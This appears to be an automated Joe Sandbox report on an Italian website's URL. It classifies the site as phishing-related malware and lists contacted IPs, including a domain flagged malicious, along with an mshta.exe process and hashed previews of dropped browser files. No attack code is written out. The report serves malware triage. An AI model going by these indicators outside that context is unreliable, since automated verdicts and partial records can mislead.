                                                                                                                                https://www.cloudflare.com/learning/access-management/phishing-attack/Tmshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.19.49-845x576.pchromecache_644.1.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://domains.google.com/suggest/flowchromecache_426.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.tripadvisor.it/Restaurant_Review-g187791-d14121704-Reviews-CiPASSO-Rome_Lazio.htmlchromecache_644.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://latest.web.skype.com/?browsername=edge_canary_shoreline0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.cloudflare.com/learning/access-management/phishing-attack/Nmshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hchromecache_644.1.drfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://schema.org/WebPagechromecache_644.1.drfalse
                                                                                                                                            high
                                                                                                                                            http://www.nytimes.com/msapplication.xml4.14.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/blchromecache_644.1.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              18.245.60.116
                                                                                                                                              unknownUnited States
                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                              3.5.136.176
                                                                                                                                              unknownUnited States
                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                              192.0.77.48
                                                                                                                                              s.w.orgUnited States
                                                                                                                                              2635AUTOMATTICUSfalse
                                                                                                                                              89.46.108.67
                                                                                                                                              www.cipassoitalia.itItaly
                                                                                                                                              31034ARUBA-ASNITfalse
                                                                                                                                              104.16.80.73
                                                                                                                                              static.cloudflareinsights.comUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              162.159.61.3
                                                                                                                                              chrome.cloudflare-dns.comUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              3.5.135.206
                                                                                                                                              s3-r-w.eu-central-1.amazonaws.comUnited States
                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                              87.250.251.119
                                                                                                                                              unknownRussian Federation
                                                                                                                                              13238YANDEXRUfalse
                                                                                                                                              157.240.252.13
                                                                                                                                              scontent.xx.fbcdn.netUnited States
                                                                                                                                              32934FACEBOOKUSfalse
                                                                                                                                              18.245.60.78
                                                                                                                                              d37vrkxza2boa5.cloudfront.netUnited States
                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                              104.16.124.96
                                                                                                                                              www.cloudflare.comUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              104.26.12.205
                                                                                                                                              unknownUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              104.21.27.98
                                                                                                                                              solve.jrqr.orgUnited States
                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                              15.197.152.159
                                                                                                                                              a37dd8b3f3000a75e.awsglobalaccelerator.comUnited States
                                                                                                                                              7430TANDEMUSfalse
                                                                                                                                              239.255.255.250
                                                                                                                                              unknownReserved
                                                                                                                                              unknownunknownfalse
                                                                                                                                              188.114.97.3
                                                                                                                                              t3.awagama.orgEuropean Union
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              77.88.21.119
                                                                                                                                              mc.yandex.ruRussian Federation
                                                                                                                                              13238YANDEXRUfalse
                                                                                                                                              172.67.74.152
                                                                                                                                              api.ipify.orgUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              216.58.206.78
                                                                                                                                              play.google.comUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              142.250.185.164
                                                                                                                                              unknownUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              3.124.71.130
                                                                                                                                              enginev2.pienissimo.comUnited States
                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                              3.33.155.121
                                                                                                                                              unknownUnited States
                                                                                                                                              8987AMAZONEXPANSIONGBfalse
                                                                                                                                              172.64.41.3
                                                                                                                                              unknownUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              104.17.246.203
                                                                                                                                              unpkg.comUnited States
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              142.250.185.132
                                                                                                                                              www.google.comUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              188.114.96.3
                                                                                                                                              unknownEuropean Union
                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                              142.250.186.164
                                                                                                                                              unknownUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              142.250.185.97
                                                                                                                                              googlehosted.l.googleusercontent.comUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              IP
                                                                                                                                              192.168.2.16
                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                              Analysis ID:1583836
                                                                                                                                              Start date and time:2025-01-03 17:32:12 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 5m 56s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                              Sample URL:http://www.cipassoitalia.it/
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:27
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal64.phis.win@75/730@76/29
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 4
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, ielowutil.exe, RuntimeBroker.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.185.227, 216.58.206.46, 74.125.71.84, 142.250.185.142, 142.250.185.174, 142.250.184.234, 216.58.212.131, 142.250.185.238, 172.67.142.245, 104.21.27.152, 172.217.16.142, 172.217.18.14, 142.250.184.206, 23.56.254.14, 2.23.227.215, 2.23.227.208, 2.23.227.221, 204.79.197.200, 142.250.184.238, 142.250.186.131, 142.250.181.238, 172.217.16.206, 13.107.5.80, 13.107.21.239, 204.79.197.239, 13.107.6.158, 172.205.80.42, 2.19.126.145, 2.19.126.152, 172.211.159.152, 2.16.168.122, 2.16.168.115, 2.19.126.157, 2.19.126.151, 142.250.181.227, 142.250.186.170, 172.217.18.106, 142.250.181.234, 216.58.206.42, 142.250.74.202, 142.250.185.234, 142.250.185.170, 142.250.186.138, 216.58.212.138, 142.250.185.202, 142.250.184.202, 142.250.185.138, 142.250.186.42, 172.217.18.10, 142.250.185.106, 142.250.186.74, 142.250.186.142, 216.58.212.142, 142.250.185.74, 172.217.23.106, 216.58.206.74, 172.217.16.138, 142.250.186.106, 216.58.212.170, 172.217.16.202, 142.250.186.78, 172.217.18.110, 142
                                                                                                                                              • Excluded domains from analysis (whitelisted): fp.msedge.net, cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, use.fontawesome.com.cdn.cloudflare.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, e11290.dspg.akamaiedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, update.googleapis.com, www.gstatic.com, ieonline.microsoft.com, www.google-analytics.com, www.bing.com, fonts.googleapis.com, fs.microsoft.com, content-autofill.googleapis.com, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, prod-agic-ne-8.northeurope.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, edgedl.me.gvt1.com, edgeassetservice.azureedge.net, clients.l.google.com, mira.config.skype.com, bx-ring.msedge.net, config.edge.skype.com.trafficmanager.net, api.bing.com, osa23prdapp02-can
                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 8184 because it is empty
                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                              • VT rate limit hit for: http://www.cipassoitalia.it/
                                                                                                                                              TimeTypeDescription
                                                                                                                                              11:33:23API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              No context
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4286
                                                                                                                                              Entropy (8bit):3.8046022951415335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                                                                                              MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                                                                                              SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                                                                                              SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                                                                                              SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):58109
                                                                                                                                              Entropy (8bit):6.106332299482327
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:k/Ps+wsI7yOmi+EeTTvqrvctoYKBuSZ+aoo:k/0+zI7yOb+EGTivOKBuWNP
                                                                                                                                              MD5:CC63572D87F7727A31456F7A23D15476
                                                                                                                                              SHA1:A4D2AEA081C41C127B5CFDD22BC5F8DF91912872
                                                                                                                                              SHA-256:15A79C25CC3956DB759D2C1A88577A145DAB161D7924ACB16DB26110D296DDA0
                                                                                                                                              SHA-512:DA47A43A5FCC1EC9BA401156A8B629909A46A7F2AA346EEF30BAD24CC9395E9D184F00814FF67D5D1A157AB5D7506DCBE73BFA7445E3F3C2F98121A2D3065E05
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):107893
                                                                                                                                              Entropy (8bit):4.640159935562401
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                              MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                              SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                              SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                              SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):107893
                                                                                                                                              Entropy (8bit):4.640159935562401
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                              MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                              SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                              SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                              SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4194304
                                                                                                                                              Entropy (8bit):0.40050498495607534
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:M4hHVQoGAgrpqYQXa0Bg1HFoqT+W785z8Ibqqphh+J6SAAg1HFEO:ZV81pqYqa0BaHn7oFbq+hh+TaHWO
                                                                                                                                              MD5:6DE4D5297FBB406C9E90E8561AE4FA49
                                                                                                                                              SHA1:6289407D65E756DB57DB3E2924B729E3CB9DA3E8
                                                                                                                                              SHA-256:94AE2A6A12849B4D34140B1C94F01BE59FBBF05135DF8702C1D98A8570AB6225
                                                                                                                                              SHA-512:B1E80625DEF5BDFA44514CB741B519D94059E0C082D4CDEE6D0D2703D41449D6EC06B02020E5110C40C3CCF6B34E5B5661C7451491A4CAEF88520A1EE8EB5E36
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...@..@...@.....C.].....@...............P<...;..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".qypywo20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............2......................w..U.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....+....W@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):280
                                                                                                                                              Entropy (8bit):4.206083764328393
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:FiWWltlUEuWZ5pXc1iUniIWpCWjwBVP/Sh/JzvKo8sBXwlWllt:o1UCp8iKgjwBVsJDKo89Q/
                                                                                                                                              MD5:6ADE03B9CDDBE3063CDE85FFE2FA23B8
                                                                                                                                              SHA1:BB954F44DE116EB35F4FC46372CCD7C0E8024868
                                                                                                                                              SHA-256:0794BB4D5A452DFCD4E3082DC11BE7E399BDAB5CCDAB1DA7AF7ED2C2834027FB
                                                                                                                                              SHA-512:86B8E4797A372E4B48820B7F57AE248AF010310AB9CE5D1DA9C21451E4A83B1ED2194ACF135B2195BDEFB0B3BE631DA47E00CDC42BD7B49D387B7BB2D512BACA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:sdPC......................z....K..s...x."DmHYrCHlc5lFyRGUq62R3qS1k3Ui6rBGmzkDnx9Vsbw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7dc5f755-0f90-4102-bc8e-37d02917bdc7............
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):115717
                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37816
                                                                                                                                              Entropy (8bit):5.556188927869588
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:DBdt397pLGLhDFWP2EfmL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZKF6Jrwq66yDdi:DBdt3rchDFWP2EfmLu1jac066q66wht+
                                                                                                                                              MD5:7EF88EF2C52F8DA18563B5B69078D138
                                                                                                                                              SHA1:B47D7C01C3E2B8198D58D30D741796B83FCC851D
                                                                                                                                              SHA-256:2DCBF96F202CFEABBF9656F0E7D3BFFED9451FCA4C00548D1714D461AB1C3742
                                                                                                                                              SHA-512:267F6B335257F86294ACDE515FCC43E42973F152C1560E426D1EF61AD327170853CA3F1198211A2E164307C985E089746A39B321552D6335CED31DF6DDD47D36
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380395637045030","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380395637045030","location":5,"ma
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12730
                                                                                                                                              Entropy (8bit):5.273229730678863
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:stMJ9pQTryZigaba4uyvso3O2hNz/kx3a88bV+F90XQApslP9YJ:stMLA3ugso33rVbGiXQQsc
                                                                                                                                              MD5:FC63A9C0DCEF19B5BC39EE1563B0EBDA
                                                                                                                                              SHA1:3A8BF9E76438CDC84543D77F3DBEB42DE0E45BD9
                                                                                                                                              SHA-256:B03EF61E9C90A76E6C9EAD468CDFBE556AC0C4ADB522917FEA53F66AD70D4CAA
                                                                                                                                              SHA-512:364C551894A6C0E4185D56CE1363AE187C79877C85111938698B04E9DF686D1F9F6B1D4D4DA3211332D0F5FBA1C1C7EC3B514677A4A7EE704BC0271A3E1C6256
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380395637437285","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):12895
                                                                                                                                              Entropy (8bit):5.270729874930865
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:stMJ9pQTryZigaba4uyvso3O2hNz/kx3a88bV+F90XQA7EslP9YJ:stMLA3ugso33rVbGiXQMEsc
                                                                                                                                              MD5:38A5F022B358C5D322C45D234F16C647
